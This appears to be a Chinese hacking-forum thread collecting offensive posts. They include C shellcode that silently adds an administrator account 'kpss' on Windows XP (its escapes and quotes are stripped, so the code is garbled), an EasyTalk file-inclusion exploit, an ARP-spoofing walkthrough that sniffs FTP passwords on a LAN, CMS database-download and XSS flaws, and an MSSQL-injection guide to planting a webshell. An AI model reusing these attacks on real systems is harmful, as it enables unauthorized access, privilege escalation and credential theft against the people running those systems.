最近看过此主题的会员

返回列表 发帖
win32/PerfectXp-pc1/sp3(Tr)添加管理员Shellcode
# Title      : win32/PerfectXp-pc1/sp3 (Tr) Add Admin Shellcode 112 bytes  # Author     : KaHPeSeSe  # Screenshot : http://i53.tinypic.com/289yamq.jpg    # Desc.      : usr: kpss  pass: 12345  localgroup: Administrator  # Tested on  : PERFECT XP PC1 / SP3  # Date       : 18/07/2011  # Not        : a.q kpss :((  



#include <stdio.h>

#include <string.h>

#include <stdlib.h>



int main(){



unsigned char shellcode[]=

xebx1bx5bx31xc0x50x31xc0x88x43x4ex53xbbx0dx25x86x7c

xffxd3x31xc0x50xbbx12xcbx81x7cxffxd3xe8xe0xffxffxff

x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73

x65x72x20x6bx70x73x73x20x31x32x33x34x35x20x2fx61x64

x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f

x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73

x20x2fx61x64x64x20x6bx70x73x73;



printf(Size = %d bytes
strlen(shellcode));



((void (*)())shellcode)();







return 0;

} 复制代码


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

先看看怎么样!觉得还可以,有点深度哦


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

EasyTalk 微博系统 X1.X 文件包含漏洞
PluginsAction.class.php 文件中的参数 $_GET['out'] 没有进行任何过滤,直接拿去调用包含文件,导
致漏洞产生。
    经典对白看代码。。。
PluginsAction.class.php:
class PluginsAction extends Action {
    public function index() {
        $app=$_GET['app'];
        $action=$_GET['action'];
        $out=urldecode($_GET['out']); //注意
        if (@file_exists(ET_ROOT .'/Plugin/'.$app.'/'.$app.'.class.php')) {
            $class = $app.'_action';
            if (class_exists($class)) {
                if (!$out) {
                    $plugin=new $class($this);
                    if ($action) {
                        echo $plugin->$action();
                        exit;
                    } else {
                        if (method_exists($class,page)) {
                            if (!$this->my) {
                                echo '<script
type="text/javascript">window.location.href="'.SITE_URL.'/login"</script>';
                                exit;
                            }
                            $content=$plugin->page();
                        }
                    }
                } else {
                    include_once(ET_ROOT .'/Plugin/'.$app.'/'.$out);  //(*^__^*) 嘻嘻 还不限
后缀呢
                    exit;
                }
            }
        }
    利用方式:直接注册用户上传头像,干掉。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

ARP监听渗透内网的方法
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
第一步: tracert 61.139.1.1
C:/WIN2000/system32>tracert 61.139.1.1
Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]
Trace complete.
这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能 进行ARPSNIFFER了
第二步:看本机IP设置和网卡情况 C:/WIN2000/system32>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : smscomputer Primary DNS Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Broadcast IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6 DHCP Enabled. . . . . . . . . . . : No IP Address. . . . . . . . . . . . : 61.139.1.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 61.139.1.65 DNS Servers . . . . . . . . . . . : 61.139.1.73
说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地 方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0 的话也只能嗅探到通过自已的数据哟. 从上面我们还可以知道网关是61.139.1.65
第三步:查看本机时间 C:/WIN2000/system32>net time //127.0.0.1
//127.0.0.1 的当前时间是 2003/1/28 下午 09:13
命令完成成功
要注意的是这儿的时间是12小时式,用at命令应要24小时式
第四步:编写启动ARPsniffer的bat文件 C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat
注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下: ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
Usage: ArpSniffer [/RESET]
第五步:后台运行开始嗅探咯 C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat
注意:这儿的时间要用24小时式 arpsniffer最好拷到system32目录下,记录文件也会生成在这儿 执行完第四步要先安装WINPCAP 2.1驱动 同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉 以SYSTEM权限启动的ARPSniffer程序 C:/winnt/system32>pulist ................... conime.exe 248 NT AUTHORITY/SYSTEM explorer.exe 1864 SMSCOMPUTER/Administrator CSRSS.EXE 2256 NT AUTHORITY/SYSTEM Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了! WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM ......................
杀了它 C:/winnt/system32>pskill 2322 PsKill v1.03 - local and remote process killer Copyright (C) 2000 Mark Russinovich http://www.sysinternals.com
Process 2322 killed.
C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)
............... 61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb 61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in. 61.188.218.179(1404)->61.139.1.79(21)QUIT 61.188.218.179(1404)->61.139.1.79(21)QUIT 61.139.1.79(21)->61.188.218.179(1404)221 61.139.1.79(21)->61.188.218.179(1404)221 ............ ............
特别要注意的就是PASS哈:)
---------------------------------------------------- 付录: 前台正常执行的显示
C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB www.netXeyes.com 2002, security@vip.sina.com
Network Adapter 0: Intel(R) 8255x Based Network Connection
Enable IP Router....OK
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02 Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88 Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88 有时这儿要先显示can not open driver(0)不管它等一下就可以了 Begin Sniffer.........


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

深喉咙企业网站生成系统漏洞!
发现问题的网页:
1.product.asp
使用工具Domain3.5
手工添加表名:adminuser
2.暴库
http://[web]/inc/conn.asp search.asp
3.后台跨站
进入后台→"构建网站"
频道管理,修改"关于我们"→"<script>alert(/sitedir.com.cn/)</script>关于我们"
工具:
encrypt decrypt加解密.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

脚本黑客基础教程 mssql数据库的注入
通常我们注入的时候不仅仅会遇到access的后台数据库,而且也会遇到mssql的数据库类型。对于小菜来说,这恐怕有些陌生,今天我就来总结一下,在有db_owner权限的情况下,该如何得到webshell。    首先介绍一下mssql数据库的操作权限分别有哪些种。第一呢,就是SA(System Administrator),它是安装MSSQL时的内置用户,他当然也就拥有很高的权限,基本等同于系统中的Administrator了。第二种,就是db_owner,它进行一般的数据库操作,也就类似于系统中的普通用户。第三种,也就是权限最低的一种,public公用的连接用户,系统中也有与之类似的guest用户。    上面做个基本了解就行了,因为如果对数据库本身不是很熟悉的话,说得过多反而会心生烦厌,还是从菜鸟的角度来写文章吧。    假如,我们现在已经找到一个使用mssql数据库的网站,并且该网站存在注入漏洞,且当前的权限为db_owner,那我们该如何来得到一个webshell呢?这里,就不同于access的数据库了,我们有两种方法可以采用。一种呢,就是采用于access数据库一样的猜解数据库中的表,猜列,然后猜内容,获取网站管理员的用户与密码。那另一种呢?刚才我们说了,有db_owner权限,那我们就可以进行一般的数据库操作了,db_owner权限的用户就可以直接列目录。这里我们就需要用到注入的工具了。那下面我就以实际的操作来给小菜做个演示。
No. 1  直接通过猜解用户名和密码
   当然,你可以采用手工的,但是对小菜来说,工具还是比较顺手,等到工具用熟练了,再去手工实践下也不迟。这里因为和access数据库的方法一样,所以我就稍微讲得不那么详细了。具体方法,可以参考access数据库的注入。(这里假设,你已经找到了一个存在注入漏洞,并且权限为db_owner的网站)。    1.使用任意一款注入工具(个人喜好吧,我以啊D演示),把注入点填入注入地址处,点击测试。    2.程序自动判断是否存在注入,以及是什么数据库等相关内容。(这里是MSSQL数据库,db_owner权限)。   3.点击“表段检查”,检测数据库中存在的表段。另外,啊D提供了一个MSSQL专用表段检测,用以完全猜解出数据库中的内容。结果出来以后,就要判断哪里是可能存放了网站管理员资料的表段了。类似admin之类的就比较明显,因为方便管理,所以一般是很好认出来的。   4.判断出关键表段之后,我们选中它,然后点击“检测字段”。因为可能存在不必要的资料,所以我们只选中我们需要猜解的内容,一般就是admin,password之类的,也是比较明显的。    5.选中我们需要猜解的内容以后,就直接点击检测内容,开始对字段里的内容进行检测。猜测结束以后,在《内容显示框》中会出现结果,我们需要的后台管理用户和密码。      注意:一般密码是经过了MD5加密的,我们可以通过http://www.cmd5.com ,或者http://www.xmd5.com等网站看能否破解,后者本地使用暴力破解的方式也可以,也有的是通过其他方式加密的,我们一般需要将其还原成明文后才能登录后台。   6.到此,我们并没有做完,因为我们的目标是webshell。通过啊D自带的管理后台检查,我们看是否能找到后台的登录地址。如果找不到,我们就通过google或着baidu之类的搜索引擎试试。这个不是这里讨论的重点。    7.有了后台地址,又有了用户和密码,我们可以直接登录后台,然后通过后台的功能来想办法得到一个webshell。    大家也看到了,虽然这种方法倒是比较傻瓜,但是还是比较烦琐的,并且,我们就不一定能在后台上得到webshell。这种方式还是有以下几个难点的。   难点关键词一、时间。 我们通过猜解表段,字段,内容,会花费掉我们不少的时间。     难点关键词二、解密。 虽然我们能够获得用户名以及密码,但是不能确保就是一定是明文的,或许因为密码强度大,又经过了MD5加密,破解不出来,又或者你根本不知道对方的加密方法,从而不能够解密得到真正的密码,恰巧网站不存在cookies欺骗漏洞那就陷入僵局之中了。   难点关键词三、功能。 我们并不知道后台里是否有足够的功能或者说是可能,让我们得到webshell,如果后台简单,不能上传,不能备份,不知道数据库等等。。那我们也基本没多少的希望。搞不好后台挂马的可能性都没有。   综合以上几个难点,通过这种方法得到webshell还是得靠很多运气的。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表